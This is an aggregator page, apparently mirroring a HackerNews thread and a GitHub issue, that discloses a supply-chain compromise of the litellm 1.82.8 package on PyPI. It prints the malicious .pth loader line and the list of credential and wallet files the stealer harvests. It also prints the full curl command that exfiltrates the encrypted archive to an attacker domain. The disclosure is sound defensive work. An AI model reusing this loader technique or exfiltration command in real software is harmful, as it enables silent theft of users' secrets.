Home 零对冲(ZeroHedge)每日HackerNews

LiteLLM Python 包受到供应链攻击。
Tell HN: Litellm 1.82.7 and 1.82.8 on PyPI are compromised

原始链接: https://github.com/BerriAI/litellm/issues/24512

## Litellm 包供应链漏洞 在 PyPI 上发现了 `litellm==1.82.8` 的一个严重安全漏洞。该包包含一个恶意 `.pth` 文件 (`litellm_init.pth`),会在 Python 解释器启动时*自动*执行一个窃取凭据的脚本——无需导入语句。 该脚本会收集大量敏感信息,包括环境变量(可能暴露 API 密钥和密钥)、SSH 密钥、云提供商凭据(AWS、Azure、GCP、Kubernetes)、加密钱包、数据库凭据和 CI/CD 密钥。然后,它使用 AES-256 和硬编码的 RSA 公钥加密此数据,并将其泄露到 `https://models.litellm.cloud/`。 该漏洞利用了 Python 自动执行 `site-packages/` 中的 `.pth` 文件的功能。有效载荷使用双重 Base64 编码进行混淆。 **影响:** 安装 `litellm==1.82.8` 的系统面临完全凭据泄露的高风险。 **建议:** 已经请求从 PyPI 上删除该包。用户应立即检查 `site-packages/` 目录中是否存在 `litellm_init.pth` 文件,并**轮换所有可能在受影响系统上暴露的凭据**。

黑客新闻 新 | 过去 | 评论 | 提问 | 展示 | 招聘 | 提交 登录 litellm 1.82.8 PyPI 包中的恶意 litellm_init.pth – 凭据窃取器 (github.com/berriai) 733 分,theanonymousone 1 天前 | 隐藏 | 过去 | 收藏 | 1 条评论 帮助 dang 1 天前 | 下一个 [–] 评论已移动至 https://news.ycombinator.com/item?id=47501426,该帖子发布得更早。回复 指南 | 常见问题 | 列表 | API | 安全 | 法律 | 申请 YC | 联系 搜索:
相关文章
原文

Summary

The litellm==1.82.8 wheel package on PyPI contains a malicious .pth file (litellm_init.pth, 34,628 bytes) that automatically executes a credential-stealing script every time the Python interpreter starts — no import litellm required.

This is a supply chain compromise. The malicious file is listed in the package's own RECORD:

litellm_init.pth,sha256=ceNa7wMJnNHy1kRnNCcwJaFjWX3pORLfMh7xGL8TUjg,34628

Reproduction

pip download litellm==1.82.8 --no-deps -d /tmp/check
python3 -c "
import zipfile, os
whl = '/tmp/check/' + [f for f in os.listdir('/tmp/check') if f.endswith('.whl')][0]
with zipfile.ZipFile(whl) as z:
    pth = [n for n in z.namelist() if n.endswith('.pth')]
    print('PTH files:', pth)
    for p in pth:
        print(z.read(p)[:300])
"

You will see litellm_init.pth containing:

import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"])

Malicious Behavior (full analysis)

The payload is double base64-encoded. When decoded, it performs the following:

Stage 1: Information Collection

The script collects sensitive data from the host system:

  • System info: hostname, whoami, uname -a, ip addr, ip route
  • Environment variables: printenv (captures all API keys, secrets, tokens)
  • SSH keys: ~/.ssh/id_rsa, ~/.ssh/id_ed25519, ~/.ssh/id_ecdsa, ~/.ssh/id_dsa, ~/.ssh/authorized_keys, ~/.ssh/known_hosts, ~/.ssh/config
  • Git credentials: ~/.gitconfig, ~/.git-credentials
  • AWS credentials: ~/.aws/credentials, ~/.aws/config, IMDS token + security credentials
  • Kubernetes secrets: ~/.kube/config, /etc/kubernetes/admin.conf, /etc/kubernetes/kubelet.conf, /etc/kubernetes/controller-manager.conf, /etc/kubernetes/scheduler.conf, service account tokens
  • GCP credentials: ~/.config/gcloud/application_default_credentials.json
  • Azure credentials: ~/.azure/
  • Docker configs: ~/.docker/config.json, /kaniko/.docker/config.json, /root/.docker/config.json
  • Package manager configs: ~/.npmrc, ~/.vault-token, ~/.netrc, ~/.lftprc, ~/.msmtprc, ~/.my.cnf, ~/.pgpass, ~/.mongorc.js
  • Shell history: ~/.bash_history, ~/.zsh_history, ~/.sh_history, ~/.mysql_history, ~/.psql_history, ~/.rediscli_history
  • Crypto wallets: ~/.bitcoin/, ~/.litecoin/, ~/.dogecoin/, ~/.zcash/, ~/.dashcore/, ~/.ripple/, ~/.bitmonero/, ~/.ethereum/keystore/, ~/.cardano/, ~/.config/solana/
  • SSL/TLS private keys: /etc/ssl/private/, Let's Encrypt .pem and .key files
  • CI/CD secrets: terraform.tfvars, .gitlab-ci.yml, .travis.yml, Jenkinsfile, .drone.yml, Anchor.toml, ansible.cfg
  • Database credentials: PostgreSQL, MySQL, Redis, LDAP config files
  • Webhook URLs: grep for Slack/Discord webhook URLs in env and config files

Stage 2: Encryption & Exfiltration

  1. Collected data is written to a temporary file
  2. A random 32-byte AES-256 session key is generated via openssl rand
  3. The collected data is encrypted with openssl enc -aes-256-cbc -pbkdf2
  4. The AES session key is encrypted with a hardcoded 4096-bit RSA public key via openssl pkeyutl -encrypt -pkeyopt rsa_padding_mode:oaep
  5. Both encrypted files are packed into tpcp.tar.gz
  6. The archive is exfiltrated via:
curl -s -o /dev/null -X POST \
  "https://models.litellm.cloud/" \
  -H "Content-Type: application/octet-stream" \
  -H "X-Filename: tpcp.tar.gz" \
  --data-binary @tpcp.tar.gz

Key Technical Details

  • Trigger mechanism: .pth files in site-packages/ are executed automatically by the Python interpreter on startup (see Python docs on .pth files). No import statement is needed.
  • Stealth: The payload is double base64-encoded, making it invisible to naive source code grep.
  • Exfiltration target: https://models.litellm.cloud/ — note the domain litellm.cloud (NOT litellm.ai, the official domain).
  • RSA public key (first 64 chars): MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvahaZDo8mucujrT15ry+...

Impact

Anyone who installed litellm==1.82.8 via pip has had all environment variables, SSH keys, cloud credentials, and other secrets collected and sent to an attacker-controlled server.

This affects:

  • Local development machines
  • CI/CD pipelines
  • Docker containers
  • Production servers

Affected Version

  • Confirmed: litellm==1.82.8 (PyPI wheel litellm-1.82.8-py3-none-any.whl)
  • Other versions: Not yet checked — the attacker may have compromised multiple releases

Recommended Actions

  1. PyPI: Yank/remove litellm 1.82.8 immediately
  2. Users: Check for litellm_init.pth in your site-packages/ directory
  3. Users: Rotate ALL credentials that were present as environment variables or in config files on any system where litellm 1.82.8 was installed
  4. BerriAI: Audit PyPI publishing credentials and CI/CD pipeline for compromise

Environment

  • OS: Ubuntu 24.04 (Docker container)
  • Python: 3.13
  • pip installed from PyPI
  • Discovered: 2026-03-24
联系我们 contact @ memedata.com